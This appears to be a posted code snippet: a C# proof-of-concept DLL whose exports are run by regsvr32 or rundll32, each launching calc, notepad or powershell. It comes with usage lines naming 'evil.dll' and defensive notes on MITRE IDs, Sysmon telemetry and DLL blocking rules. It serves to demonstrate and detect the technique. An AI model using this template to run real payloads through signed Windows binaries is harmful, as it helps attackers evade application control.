opexxx
5/10/2017 - 4:29 PM

Execute a DLL via Regsvr32

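Execute a DLL via Regsvr32: a proof-of-concept managed DLL whose exported functions are called by regsvr32 (DllRegisterServer / DllUnregisterServer) or by rundll32 (EntryPoint). Each export only launches a harmless program (calc.exe, notepad.exe, powershell.exe), which shows that a signed Windows binary will run whatever code is in the DLL it is asked to load.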

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;

namespace Export
{
    /// <summary>
    /// Proof-of-concept holder for three unmanaged exports (via the DllExport
    /// attribute) that are invoked by rundll32 and regsvr32. Each export does
    /// nothing except start a different, benign program so the call path can
    /// be told apart by which window appears.
    /// </summary>
    /// <remarks>
    /// Defensive notes. The technique is tracked as MITRE ATT&amp;CK T1218.010
    /// (Regsvr32) and T1218.011 (Rundll32). Because the program is started from
    /// inside the host process, process-creation telemetry (Security event 4688,
    /// Sysmon event ID 1) records regsvr32.exe or rundll32.exe as the parent, and
    /// image-load telemetry (Sysmon event ID 7) records the DLL being loaded.
    /// Useful signals: regsvr32/rundll32 spawning any child process, and either
    /// host loading an unsigned DLL from a user-writable path. Application
    /// control that enforces DLL rules (WDAC, or AppLocker with the DLL rule
    /// collection enabled) blocks the load itself.
    /// </remarks>
    class Test
    {
        /// <summary>
        /// Starts <paramref name="program"/> with default start-info settings.
        /// Shared by all three exports.
        /// </summary>
        /// <param name="program">File name of the executable to start.</param>
        private static void Launch(string program)
        {
            Process.Start(new ProcessStartInfo(program));
        }

        /// <summary>
        /// Export with the rundll32 callback signature. The four arguments are
        /// accepted but not used; the export just starts calc.exe.
        /// </summary>
        /// <param name="hwnd">Unused.</param>
        /// <param name="hinst">Unused.</param>
        /// <param name="lpszCmdLine">Unused.</param>
        /// <param name="nCmdShow">Unused.</param>
        [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
        public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
        {
            Launch("calc.exe");
        }

        /// <summary>
        /// Export called by <c>regsvr32 evil.dll</c>; starts notepad.exe.
        /// </summary>
        [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
        public static void DllRegisterServer()
        {
            Launch("notepad.exe");
        }

        /// <summary>
        /// Export called by <c>regsvr32 /u evil.dll</c>; starts powershell.exe.
        /// </summary>
        [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
        public static void DllUnregisterServer()
        {
            Launch("powershell.exe");
        }

        // Which export runs depends on how regsvr32 is invoked:
        //   regsvr32 /u evil.dll  --> calls DllUnregisterServer
        //   regsvr32 evil.dll     --> calls DllRegisterServer
        // In both cases the launched program appears as a child of regsvr32.exe,
        // which is the relationship to alert on.
    }
}
Base64 Encoded Sample (.NET 2.0 or Higher x64)
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